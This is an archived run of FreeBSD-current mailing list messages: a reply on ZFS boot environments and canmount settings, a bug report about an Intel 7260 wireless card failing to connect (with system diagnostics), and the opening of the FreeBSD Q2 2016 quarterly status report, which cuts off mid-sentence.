rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <20160728020548.GD26793@gmail.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="swQIpMP0CpKVmJ8eeDTbiTpDwePf2gjrd" X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 02:18:50 -0000 This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --swQIpMP0CpKVmJ8eeDTbiTpDwePf2gjrd Content-Type: multipart/mixed; boundary="tUAsGEVHSjuAftcCp88TIrCPLs1H3qGh1" From: Allan Jude To: freebsd-current@freebsd.org Message-ID: Subject: Re: Boot environments and zfs canmount=noauto References: <20160728020548.GD26793@gmail.com> In-Reply-To: <20160728020548.GD26793@gmail.com> --tUAsGEVHSjuAftcCp88TIrCPLs1H3qGh1 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable On 2016-07-27 22:05, Randy Westlund wrote: > I'm trying to follow Michael Dexter's post about using bhyve with boot > environments. It involves moving all child datasets under > zroot/ROOT/default, so that you can have entirely independent systems. >=20 > http://callfortesting.org/bhyve-boot-environments/ >=20 >> Let's change the datasets with "canmount on" to "canmount noauto": >> [snip] >> Considering that this setting is harmless to a system with a single >> boot environment, I would not object to it being the default. Hint >> hint.=20 >=20 > When I set all the datasets with canmount=3Don to canmount=3Dnoauto, on= ly > zroot/ROOT/default gets mounted on next boot. It's my understanding > that 'zfs mount -a' doesn't mount datasets with canmount=3Dnoauto, but = if > I leave them with canmount=3Don, they will try to mount regardless of > which BE is active. >=20 > I'm trying this with 11.0-BETA2. Can sometime tell me what I'm missing= ? >=20 You are not missing anything. This is why the default is to have all files that are specific to a BE be in the root dataset, and only files that are global (like home directory, etc) be outside of the BE. In order to do it the way Dexter is proposing, you can set them canmount=3Dnoauto or with mountpoint=3Dlegacy, and then mount them via fs= tab (defined differently in each BE), but that kind of defeats a lot of the purpose of ZFS. --=20 Allan Jude --tUAsGEVHSjuAftcCp88TIrCPLs1H3qGh1-- --swQIpMP0CpKVmJ8eeDTbiTpDwePf2gjrd Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) iQIcBAEBAgAGBQJXmWuCAAoJEBmVNT4SmAt+skoQAOJptWsZmCtlZ/fZP9v7f/KG 2wBNJCuk6Va1d27/0+lDwWGJAykaRaHeXHPTPPplRjV9i8kXaX923BU03VUecu0i Kr6OYLbbO2kq0miE9S5nNgevmbSK6ynZATyumMzNfzBm5to2yEYdrSTSS0Sde/M5 DoRj0jzOREEWeq04r4W8YCrvYtFalXic9b3b+sOinrd9Oe2Ne90FjhZXaVXegHrn IHT+DKPqyf2aTXTgtQG9a5l5kq8wiSphbbrpYuSfkELEsRUK00pHvFjYtdnhDYUy u3vxS6/4l6fniXT2BTk3UGCPcym0sA2CrPFeGf5lhb3hTLbh21se9gnfzSlwjdnR oZyvqrk+NbOLXItu8Ei24grREJpMEOIoTGzew021HYol92kkM/6DV+PyPtGeShNd hyBdXAUYDvrpWvSYv4Li33EE5XUxSHTbo6+HiG0NMuZJTWV+lEvdcw9m0wnJH9al DTnDdPG92on4Ir9jIbbVLmaFBdIvZNubhnljZ/O5TfjXYJH2RhTTyfy87x6JYMO2 JpgmLG55VGR5HMB5XtHTLWCN1UmQj0Bd9Ii75LIGB8fj1YliXS3d0W2dZ4x8h8KP T72UDSpbnbp91Oi+jDYvC8DZ6MnxNQJyLeo7Ydvw6AeWYwU+Yh1Noofp7qQjaztZ xcvx2TrsjwgVma467mNn =7nj3 -----END PGP SIGNATURE----- --swQIpMP0CpKVmJ8eeDTbiTpDwePf2gjrd-- From owner-freebsd-current@freebsd.org Thu Jul 28 02:39:57 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id E1280BA636A; Thu, 28 Jul 2016 02:39:57 +0000 (UTC) (envelope-from ler@lerctr.org) Received: from thebighonker.lerctr.org (thebighonker.lerctr.org [IPv6:2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "thebighonker.lerctr.org", Issuer "COMODO RSA Domain Validation Secure Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id C3B2F137A; Thu, 28 Jul 2016 02:39:57 +0000 (UTC) (envelope-from ler@lerctr.org) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=lerctr.org; s=lerami; h=Content-Type:MIME-Version:Message-ID:Subject:To:From:Date:Sender :Reply-To:Cc:Content-Transfer-Encoding:Content-ID:Content-Description: Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID: In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:List-Subscribe: List-Post:List-Owner:List-Archive; bh=bVvc30FAztx3sjYfFNn0wg+oCU0ZyAZ/7Jy67uNYjUQ=; b=L9Hfp3Y4tYZc+tFMe0pceup1Ck sy8LSIrlI/wTuZny9/Uf0i+T+IeEhYiHrqC5u7E1pKX/V4rUTfNb9W5nzC7u5KjBgi4EvseYxwMaj xZiV3cHKC98LqnORhQ2MOb0Z2GjcHqq2JdNeN6hXu0QDR4xoDX+FvHn+NDd8XSc7wtFc=; Received: from [2001:470:1f0f:42c:2247:47ff:fe73:75f] (port=56748 helo=pita) by thebighonker.lerctr.org with esmtpsa (TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256) (Exim 4.87 (FreeBSD)) (envelope-from ) id 1bSbEr-0005LD-1D; Wed, 27 Jul 2016 21:39:57 -0500 Date: Wed, 27 Jul 2016 21:39:55 -0500 From: Larry Rosenman To: freebsd-wireless@freebsd.org, freebsd-current@freebsd.org Subject: IWM(7260), no connect Message-ID: <20160728023954.GA1321@pita> Mail-Followup-To: freebsd-wireless@freebsd.org, freebsd-current@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 02:39:58 -0000 I'm running today's top of tree, and it doesn't seem to want to connect: re0: flags=8843 metric 0 mtu 1500 options=8209b ether 20:47:47:73:07:5f inet6 fe80::2247:47ff:fe73:75f%re0 prefixlen 64 scopeid 0x1 inet6 2001:470:1f0f:42c:2247:47ff:fe73:75f prefixlen 64 autoconf inet 192.168.200.246 netmask 0xfffffc00 broadcast 192.168.203.255 nd6 options=23 media: Ethernet autoselect (1000baseT ) status: active lo0: flags=8049 metric 0 mtu 16384 options=600003 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 inet 127.0.0.1 netmask 0xff000000 nd6 options=21 groups: lo wlan0: flags=8c43 metric 0 mtu 1500 ether 58:91:cf:1a:45:69 inet6 fe80::5a91:cfff:fe1a:4569%wlan0 prefixlen 64 scopeid 0x3 nd6 options=23 media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) status: no carrier ssid "" channel 8 (2447 MHz 11g) regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS wme roaming MANUAL groups: wlan hostb0@pci0:0:0:0: class=0x060000 card=0x07061028 chip=0x19108086 rev=0x07 hdr=0x00 vendor = 'Intel Corporation' device = 'Skylake Host Bridge/DRAM Registers' class = bridge subclass = HOST-PCI pcib1@pci0:0:1:0: class=0x060400 card=0x20158086 chip=0x19018086 rev=0x07 hdr=0x01 vendor = 'Intel Corporation' device = 'Skylake PCIe Controller (x16)' class = bridge subclass = PCI-PCI pcib2@pci0:0:1:1: class=0x060400 card=0x07061028 chip=0x19058086 rev=0x07 hdr=0x01 vendor = 'Intel Corporation' device = 'Skylake PCIe Controller (x8)' class = bridge subclass = PCI-PCI vgapci1@pci0:0:2:0: class=0x030000 card=0x07061028 chip=0x191b8086 rev=0x06 hdr=0x00 vendor = 'Intel Corporation' device = 'HD Graphics 530' class = display subclass = VGA none0@pci0:0:4:0: class=0x118000 card=0x07061028 chip=0x19038086 rev=0x07 hdr=0x00 vendor = 'Intel Corporation' device = 'Skylake Processor Thermal Subsystem' class = dasp xhci0@pci0:0:20:0: class=0x0c0330 card=0x07061028 chip=0xa12f8086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H USB 3.0 xHCI Controller' class = serial bus subclass = USB none1@pci0:0:20:2: class=0x118000 card=0x07061028 chip=0xa1318086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H Thermal subsystem' class = dasp none2@pci0:0:21:0: class=0x118000 card=0x07061028 chip=0xa1608086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H Serial IO I2C Controller' class = dasp none3@pci0:0:22:0: class=0x078000 card=0x07061028 chip=0xa13a8086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H CSME HECI' class = simple comms ahci0@pci0:0:23:0: class=0x010601 card=0x07061028 chip=0xa1038086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H SATA Controller [AHCI mode]' class = mass storage subclass = SATA pcib3@pci0:0:28:0: class=0x060400 card=0x07061028 chip=0xa1108086 rev=0xf1 hdr=0x01 vendor = 'Intel Corporation' device = 'Sunrise Point-H PCI Express Root Port' class = bridge subclass = PCI-PCI pcib4@pci0:0:28:4: class=0x060400 card=0x07061028 chip=0xa1148086 rev=0xf1 hdr=0x01 vendor = 'Intel Corporation' device = 'Sunrise Point-H PCI Express Root Port' class = bridge subclass = PCI-PCI pcib5@pci0:0:28:5: class=0x060400 card=0x07061028 chip=0xa1158086 rev=0xf1 hdr=0x01 vendor = 'Intel Corporation' device = 'Sunrise Point-H PCI Express Root Port' class = bridge subclass = PCI-PCI pcib6@pci0:0:28:6: class=0x060400 card=0x07061028 chip=0xa1168086 rev=0xf1 hdr=0x01 vendor = 'Intel Corporation' device = 'Sunrise Point-H PCI Express Root Port' class = bridge subclass = PCI-PCI isab0@pci0:0:31:0: class=0x060100 card=0x07061028 chip=0xa14e8086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H LPC Controller' class = bridge subclass = PCI-ISA none4@pci0:0:31:2: class=0x058000 card=0x07061028 chip=0xa1218086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H PMC' class = memory hdac0@pci0:0:31:3: class=0x040300 card=0x07061028 chip=0xa1708086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H HD Audio' class = multimedia subclass = HDA none5@pci0:0:31:4: class=0x0c0500 card=0x07061028 chip=0xa1238086 rev=0x31 hdr=0x00 vendor = 'Intel Corporation' device = 'Sunrise Point-H SMBus' class = serial bus subclass = SMBus vgapci0@pci0:2:0:0: class=0x030200 card=0x07061028 chip=0x139b10de rev=0xa2 hdr=0x00 vendor = 'NVIDIA Corporation' device = 'GM107M [GeForce GTX 960M]' class = display subclass = 3D re0@pci0:4:0:0: class=0x020000 card=0x07061028 chip=0x816810ec rev=0x10 hdr=0x00 vendor = 'Realtek Semiconductor Co., Ltd.' device = 'RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller' class = network subclass = ethernet iwm0@pci0:5:0:0: class=0x028000 card=0xc0708086 chip=0x08b18086 rev=0x6b hdr=0x00 vendor = 'Intel Corporation' device = 'Wireless 7260' class = network none6@pci0:6:0:0: class=0xff0000 card=0x522a10ec chip=0x522a10ec rev=0x01 hdr=0x00 vendor = 'Realtek Semiconductor Co., Ltd.' device = 'RTS522A PCI Express Card Reader' What other info do we need? Path: /usr/src Working Copy Root Path: /usr/src URL: https://svn.freebsd.org/base/head Relative URL: ^/head Repository Root: https://svn.freebsd.org/base Repository UUID: ccf9f872-aa2e-dd11-9fc8-001c23d0bc1f Revision: 303419 Node Kind: directory Schedule: normal Last Changed Author: bdrewery Last Changed Rev: 303419 Last Changed Date: 2016-07-27 16:45:11 -0500 (Wed, 27 Jul 2016) FreeBSD pita 12.0-CURRENT FreeBSD 12.0-CURRENT #2 r303419: Wed Jul 27 21:22:29 CDT 2016 root@pita:/usr/obj/usr/src/sys/IWM-DEBUG amd64 1200001 1200001 -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 214-642-9640 E-Mail: ler@lerctr.org US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Thu Jul 28 03:02:08 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 4F965BA6978; Thu, 28 Jul 2016 03:02:08 +0000 (UTC) (envelope-from kaduk@mit.edu) Received: from dmz-mailsec-scanner-6.mit.edu (dmz-mailsec-scanner-6.mit.edu [18.7.68.35]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 9247316B0; Thu, 28 Jul 2016 03:02:07 +0000 (UTC) (envelope-from kaduk@mit.edu) X-AuditID: 12074423-b4bff70000004c44-60-579975ac2974 Received: from mailhub-auth-3.mit.edu ( [18.9.21.43]) (using TLS with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by (Symantec Messaging Gateway) with SMTP id BD.6E.19524.CA579975; Wed, 27 Jul 2016 23:02:04 -0400 (EDT) Received: from outgoing.mit.edu (outgoing-auth-1.mit.edu [18.9.28.11]) by mailhub-auth-3.mit.edu (8.13.8/8.9.2) with ESMTP id u6S3237a013193; Wed, 27 Jul 2016 23:02:03 -0400 Received: from multics.mit.edu (system-low-sipb.mit.edu [18.187.2.37]) (authenticated bits=56) (User authenticated as kaduk@ATHENA.MIT.EDU) by outgoing.mit.edu (8.13.8/8.12.4) with ESMTP id u6S320N8003579 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT); Wed, 27 Jul 2016 23:02:02 -0400 Received: (from kaduk@localhost) by multics.mit.edu (8.12.9.20060308) id u6S31x5M028228; Wed, 27 Jul 2016 23:01:59 -0400 (EDT) Date: Wed, 27 Jul 2016 23:01:59 -0400 (EDT) From: Benjamin Kaduk X-X-Sender: kaduk@multics.mit.edu To: freebsd-hackers@FreeBSD.org cc: freebsd-current@FreeBSD.org, freebsd-stable@FreeBSD.org Subject: FreeBSD Quarterly Status Report - Second Quarter 2016 Message-ID: User-Agent: Alpine 1.10 (GSO 962 2008-03-14) MIME-Version: 1.0 X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFlrEKsWRmVeSWpSXmKPExsUixCmqrbumdGa4wYqDkhZz3nxgsti++R+j xeFmIQdmjxmf5rMEMEZx2aSk5mSWpRbp2yVwZTzd3spS8PQYS8XbZWeYGxi/H2XuYuTkkBAw kfi4tpsdxBYSaGOS+Hm3pouRC8jeyCgx4/ciVgjnEJPE9J+v2CCcBkaJhicXWEFaWAS0JW4v /8QEYrMJqEmsX3ENaqyixOZTk8BsEQF5iX1N78FWMAtYS7SsfAHWKyxgJ9HZ+YsNxOYVcJA4 d+42mC0qoCOxev8UFoi4oMTJmU+AbA6gXn+JD+fiJzDyz0KSmYWQmQW2QFfizaqDTBC2tsT9 m21sCxhZVjHKpuRW6eYmZuYUpybrFicn5uWlFuma6eVmluilppRuYgQFKruL8g7Gl33ehxgF OBiVeHgfPJ4RLsSaWFZcmXuIUZKDSUmUNyx0ZrgQX1J+SmVGYnFGfFFpTmrxIUYJDmYlEd7b BUA53pTEyqrUonyYlDQHi5I47/Zv7eFCAumJJanZqakFqUUwWRkODiUJ3tgSoEbBotT01Iq0 zJwShDQTByfIcB6g4clFIMOLCxJzizPTIfKnGMM5Hk27tpaJ49jcG0BywcKbQHLbyjtA8t/r eyCRKfeB5Bow+WwqkBRiSS9KrJQS511fDDROAGRcRmke3EZw0trNpPqKURwYAMK8e0AO4wEm PLidr4DOYQI6pzh2Bsg5JYkIKakGRu7r99689563aOGi/cpxbYvn9a9fEO35Tt3ix78T2zYq 3WGR/Bz1rPPu8ilnNnw+qb92StvjI933Jxh+F3j7L7Qh8VNV94aj8YULXpZHpfRwun45mXbH v21CmfbR3mtO1qnl4R8rSlqFXzC+uJ90bdKyvN1zkxbrqKw54i1zIMnJQG/uVOZzV+2UWIoz Eg21mIuKEwGxVWWaNQMAAA== Content-Type: TEXT/PLAIN; charset=ISO-8859-15 Content-Transfer-Encoding: QUOTED-PRINTABLE X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 03:02:08 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 FreeBSD Project Quarterly Status Report - Second Quarter 2016 Now available: the 2016Q2 model of the FreeBSD Project Status Report! This quarter brings several exciting improvements over previous models. We have enhancements from different teams, new features like robust mutexes and support for full disk encryption with GELI. You'll find expanded graphics support, both at the chipset and window manager levels, and ongoing development in many pending features. Perhaps most exciting, under the hood you'll find a brand-new Core Team. Don't wait. Take FreeBSD for a spin today. --Michael W. Lucas __________________________________________________________________ Please submit status reports for the third quarter of 2016 by October 7. __________________________________________________________________ FreeBSD Team Reports * FreeBSD IRC Admin Team * FreeBSD Issue Triage Team * FreeBSD Release Engineering Team * Ports Collection * The FreeBSD Core Team * The FreeBSD Foundation Projects * ASLR Interim State * Ceph on FreeBSD * EFI Refactoring and GELI Support * Robust Mutexes * The Graphics Stack on FreeBSD Kernel * ARM Allwinner SoC Support * FreeBSD on Hyper-V and Azure * VIMAGE Virtualized Network Stack Update Architectures * FreeBSD/arm64 Userland Programs * Reproducible Builds in FreeBSD * Updates to GDB * Using lld, the LLVM Linker, to Link FreeBSD Ports * Bringing GitLab into the Ports Collection * GNOME on FreeBSD * Intel Networking Tools * IPv6 Promotion Campaign * KDE on FreeBSD * Obsoleting Rails 3 __________________________________________________________________ FreeBSD Team Reports FreeBSD IRC Admin Team Links FreeBSD IRC Wiki URL: https://wiki.FreeBSD.org/IRC/ Contact: IRC Admin Team Contact: Kubilay Kocak Contact: Eitan Adler The FreeBSD IRC Admin team manages the FreeBSD Project's IRC presence on the freenode IRC network, looking after: * Registrations and ongoing management of channels within the official namespace (#freebsd*). * Liaising with freenode staff. * Allocating freebsd hostmask cloaks for users. * General user support. In order to facilitate a constructive and positive environment for all members of the FreeBSD community, IRC Admin over the past 3-9 months has established and consolidated a consistent baseline with respect to the management of its channels on freenode. This report is a summary of what has happened so far and things to come. These activities were completed over the last few quarters: * Registered FreeBSD Group Contacts (GC) with freenode staff. For information on what this means, see the group registration page. * Created a FreeBSD NickServ account to assign as primary owner/founder of the #freebsd* namespace channels. * The primary channels are owned/founded by a generic FreeBSD account that is owned and managed by the FreeBSD Project. * Created the Services::IRC component in Bugzilla for change requests and issue reports. * Obtained a report of all registered freenode channels matching the #freebsd* namespace and assessed the list for current ownership and activity status. * Assigned freebsd/ user cloaks to users requesting them. For more information, see IRC Cloaks. * Obtained a report on all nicknames and accounts with existing freebsd/* user cloaks. * Liaised with freenode staff on upcoming changes to freebsd channels. The goals for the next few quarters are to: * Complete the transfer of founder ownership for all #freebsd* channels. Existing channel creators, some of whom are project members and others who are not, will be contacted using known contact information or contact information set in their registered NickServ account, in order to initiate the transfer of the channel to the FreeBSD Project. If the contact information of the existing channel owner cannot be obtained, or if no response is received after a suitable period of time has elapsed, IRC Admin will complete the ownership transfer with freenode staff. * Deregister defunct and inactive #freebsd* channels. Channels which have no visible signs of activity based on last active time or registered owner last seen, have been deprecated by alternative channels, or have no other way of having ownership transferred will be deregistered. For channels where a sunset period may be suitable, a channel topic will be set, and optionally a forwarding channel, informing users of the changes, including support and contact information. * Create and document baseline procedures and guidelines. These include: Community and User Guidelines, a Code of Conduct, Operator and Moderator Guidelines and Expectations, Abuse Reporting and Dispute Resolution Guidelines, and procedures for delegation of channel management. * Standardize and re-create channel access lists. Existing access lists and user permissions for all #freebsd* channels remain in their states prior to FreeBSD Group Registration. Consolidation and reassignment to the FreeBSD Project is needed. In order to ensure a consistent user and community experience in official FreeBSD channels going forward, access lists for all channels will be created from the ground up. Users with existing access to channels may, at the IRC Admin team's discretion, be provided with the opportunity to re-apply for access subject to any conditions, terms, or guidelines that may be appropriate. * Determine the methods for informing project members and the community of future changes to IRC services, procedures, and policies. * Determine methods to designate existing channel founders as channel managers or similar. * Update the channels list on the Wiki to distinguish official and unofficial channels. * Establish consistent modes, entry messages, and topics for all channels. Users are invited to /join #freebsd-irc on the freenode IRC network. The IRC Admin team welcomes ideas, contructive criticism, and feedback on how the FreeBSD Project can improve the service and experience it provides to the community. While the vast majority of the broader community interacts on the freenode IRC network, the FreeBSD developer presence there needs to be significantly improved. There are many opportunities to be had by increasing the amount and quality of interaction between FreeBSD users and developers, both in terms of developers keeping their finger on the pulse of the community and in encouraging and cultivating greater contributions to the Project over the long term. It is critical to have a strong developer presence amongst users, and IRC Admin would like to call on all developers to join the FreeBSD freenode channels to help support that presence. We are the FreeBSD giants on whose shoulders the future contributors stand. It is important to be there, in force. __________________________________________________________________ FreeBSD Issue Triage Team Contact: Vladimir Krstulja Contact: Kubilay Kocak Contact: Bugmeister Since the Triage Team was introduced in the October-December 2015 report, it has been working on the following three major aspects of issue triage: * Recruiting and educating more users to assist in issue triage. * Identifying problem areas, especially from the fresh eyes perspective, revealing issues not immediately obvious to contributors with experience. * Proposing changes to improve the issue triage process. Our efforts have almost exclusively focused on issues in the "Ports & Packages" component as that is the easiest starting point. Other categories like "Base System" require more knowledge and experience with problem content and workflow. During this time, Rodrigo was inactive due to lack of available time, and Vladimir was unable to commit enough time during the first quarter of the year, but provided active contribution during the second. It became obvious that the Issue Triage Team must concentrate on additional recruitment in the coming quarter. In the last two quarters, several problems were identified and the formulated solutions will be published on our upcoming Wiki page. A summary of those issues is given here: 1. Issue triage, defined as "ensure that an issue is summarized, classified, and assigned to appropriate people", is too time consuming. Bugzilla automation through auto-assign helps, but is insufficient. If the triage process is extended to include "track the issue through its entire life to resolution", the time and effort required grows exponentially. Fortunately, there are many things the community can do, with minimum effort, that help greatly. Part of the recruitment and education process is educating users on how to properly treat their own issues and issues they interact with, in order to maximize the efficiency of issue tracking and problem resolution. 2. Various timeouts are inadequate. For example, the maintainer timeout is too long and does not differentiate between classes of issues, such as a non-security and a security timeout. Other timeouts are not covered, such as assignee timeouts, when an issue has been assigned with no follow-up activity. Another example is a timeout where additional information was requested but never provided. We will be recommending several changes and documenting these in our Wiki. 3. Partially as a consequence of inadequate timeouts and inadequate ability to efficiently track issues through their entire lifecycle, a great number of issues are open for too long. We have identified several classes of those issues and will document the solutions to each in the near future. 4. Bugzilla is not perfect and at times it can hinder the ability to properly track issues clearly and accurately, in order to resolve them quickly. However, changing bug tracking software is a tremendous effort, so we will instead recommend technical and workflow improvements in order to improve the user experience as much as possible. For example, we identified additional saved searches to help track and quickly find issue categories and, more importantly, their states. Another example is ensuring that various flags and keywords are unambiguous and well understood. For instance, "patch" and "patch-ready" can often be misunderstood or misapplied. 5. Issue statistics are lacking, and for the next quarter we intend to change that. Statistics help to provide insight into potential bottlenecks and inform the prioritization of improvements to the issue tracker and workflows. Open tasks: 1. Recruit more suitable triagers into the team, both committers and community members. 2. Gather and present some interesting statistics for the next report. 3. Set up the Wiki page with identified problems and recommended guidelines and policies. 4. Find common use patterns and add more saved searches to Bugzilla. __________________________________________________________________ FreeBSD Release Engineering Team Links FreeBSD 10.3-RELEASE schedule URL: https://www.FreeBSD.org/releases/10.3R/schedule.html FreeBSD 11.0-RELEASE schedule URL: https://www.FreeBSD.org/releases/11.0R/schedule.html FreeBSD Development Snapshots URL: http://ftp.FreeBSD.org/pub/FreeBSD/snapshots/ISO-IMAGES/ Contact: FreeBSD Release Engineering Team The FreeBSD Release Engineering Team is responsible for setting and publishing release schedules for official project releases of FreeBSD, announcing code freezes and maintaining the respective branches, among other things. The FreeBSD Release Engineering Team completed the 10.3-RELEASE cycle late April, led by Marius Strobl. The release was one week behind the original schedule, to accommodate for a few last-minute critical issues that were essential to fix in the final release. The FreeBSD 11.0-RELEASE cycle started late May, one month behind the original schedule. The schedule slip was primarily to accommodate efforts for packaging the FreeBSD base system with the pkg(8) utility. However, as work on this progressed, it became apparent that there were too many outstanding issues. As a result, packaged base will be a "beta" feature for 11.0-RELEASE, with the goal of promoting it to a first-class feature in 11.1-RELEASE. It is expected that provisions will be made to ensure a seamless transition from older supported releases. Despite the fact that packaged base is not going to be a prime feature for FreeBSD 11.0-RELEASE, the Release Engineering Team would like to thank everyone who tested, provided patches, provided ideas and feedback, and in some cases, shot themselves in the foot due to bugs. This project was sponsored by The FreeBSD Foundation. __________________________________________________________________ Ports Collection Links FreeBSD Ports Website URL: https://www.FreeBSD.org/ports/ How to Contribute URL: https://www.FreeBSD.org/doc/en_US.ISO8859-1/articles/contributing/= ports-contributing.html Ports Monitoring Website URL: http://portsmon.FreeBSD.org/index.html Ports Management Team Website URL: https://www.FreeBSD.org/portmgr/index.html Ports Management Teamon Twitter URL: https://twitter.com/freebsd_portmgr/ Ports Management Team on Facebook URL: https://www.facebook.com/portmgr Ports Management Team on Google+ URL: https://plus.google.com/communities/108335846196454338383 Contact: Ren=E9 Ladan Contact: FreeBSD Ports Management Team The 2016Q3 branch of the Ports Tree currently contains over 26,100 ports, with the PR count around 2,000. Of those, around 425 are unassigned. The activity dropped somewhat, with 5,300 commits made by 125 active committers. Almost 1,760 PRs were closed in the last quarter. In the last quarter, we added two new committers: Ben Woods (woodsb02) and Torsten Z=FChlsdorff (tz). No commit bits were taken in for safe keeping. On the management side, mat took over the role of cluster admin liaison from erwin, who decided to step down from portmgr. rene took over the role of port manager secretary from culot. No other changes were made. A lot of work was done on modernizing the infrastructure of the Ports Tree, by introducing 6 new USES knobs, one new keyword, and splitting out the larger targets of bsd.port.mk into separate scripts. There were a total of 42 exp-runs to validate these and other infrastructure changes and package updates. Furthermore, checks were added to the quality assurance phase of Poudriere to check for missing indirect dependencies, and advancements were made for reproducable package builds. Some noticeable package updates are: Firefox 47.0.1, Firefox ESR 45.2.0, Thunderbird 45.1.1, Chromium 51.0.2704.106, Ruby 2.2.5, Ruby Gems 2.6.2, pkg 1.8.6, gmake 4.2.1, KDE 4.14.10, Python 2.7.12, libc++ 3.8.0, and binutils 2.26. Behind the scenes, antoine made sure that the exp-run- and package builders were kept up-to-date. bdrewery worked on further automating and hardening the package building infrastructure. During BSDCan, mat worked on various items, including updating the Porter's Handbook, and portmgr held a meeting to discuss various items. __________________________________________________________________ The FreeBSD Core Team Contact: FreeBSD Core Team The highlight of Core's second quarter has been the regular biennial election of a new Core team. Core would like to thank Dag-Erling Sm=F8grav and Glen Barber for running the vote. Despite an initially slo= w uptake on nominations, fourteen candidates eventually stood, including four incumbent members of core. The ninth FreeBSD Core team will be: * John Baldwin * Baptiste Daroussin * Allan Jude * Ed Maste * Kris Moore * George V. Neville-Neil * Benedict Reuschling * Benno Rice * Hiroki Sato The new Core Team would like to thank the departing members for their many years of service. Members stepping down are: * Gavin Atkinson * Gleb Smirnoff * David Chisnall * Robert Watson * Peter Wemm The second most notable achievement this quarter was the successful conclusion of an issue that had been on Core's agenda for many years. With the creation of planet.FreeBSD.org, the FreeBSD Project finally has an official blog aggregation service. Core spent a significant amount of time reviewing licensing and ensuring that the FreeBSD source remains unencumbered by onerous license terms. This quarter involved approving Adrian Chadd's plan to import GPLv2 licensed code, allowing bwn(4) to be built as a loadable module with support for 802.11n networking. This required confirmation that the license terms on the latest dummynet AQM patches were acceptable and that its variant on the BSD 2-clause license is suitable for use in the FreeBSD base system. Core applied for, and received, a project-wide license for the use of the JetBrains static analysis tool suite, at the behest of Mathieu Previot. Another of Core's important functions is to ensure good relations amongst developers. To that end, members of Core provided oversight over the backing-out of disputed blacklistd-related patches to OpenSSH, and acted to smooth over ruffled tempers. This quarter saw the usual quota of gentle reminders to avoid intemperate language and other counter-productive behavior. Core had to take immediate action about death threats appearing on some of the mailing lists. The culprit was immediately banned from the mailing lists and reported to their email service provider. That person will be similarly removed should they be identified as having rejoined under a different alias. Other activities included: * Working with university authorities in an attempt to get documentation certifying that a prospective GSoC student was legally allowed to work on FreeBSD code as a foreigner enrolled at a USA university. This issue was eventually solved by the student returning home for the summer and working from there. * Issuing guidance on policy around forced commits, or trivial changes used as a means of correcting a commit message. In these cases, the correct approach is to revert the commit and re-commit with the correct message. This ensures the continuing usefulness of svn blame. * Approving a delay to the planned introduction of packaged base and confirming that this did not require any change to the new support policies to be introduced with 11.0-RELEASE. During this quarter, four new commit bits were awarded and none were taken in. Please welcome Emmanuel Vadot, Landon Fuller, Mike Karels, and Eric Badger as new src committers. Yes, that is the same Mike Karels who was once a member of the CSRG at Berkeley and co-author of 